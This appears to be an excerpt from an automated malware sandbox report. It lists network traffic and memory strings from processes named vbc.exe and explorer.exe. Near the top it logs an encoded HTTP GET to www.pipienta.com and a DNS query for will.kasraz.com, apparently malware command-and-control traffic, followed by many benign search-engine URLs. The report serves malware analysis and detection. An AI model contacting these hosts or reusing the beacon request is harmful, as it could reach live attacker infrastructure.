          Source: global trafficHTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.pipienta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: will.kasraz.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 15:00:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=LaxCF-Cache-Status: MISScf-request-id: 09d97e072e00004e44b212b000000001Server: cloudflareCF-RAY: 64a2991eb90d4e44-FRAData Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2171469708.0000000002281000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
